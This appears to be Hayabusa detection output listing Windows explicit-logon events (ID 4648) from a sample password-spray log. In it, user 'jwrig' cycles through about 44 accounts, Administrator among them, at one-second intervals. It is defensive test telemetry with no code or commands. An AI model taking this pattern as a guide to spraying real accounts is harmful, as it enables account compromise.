2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
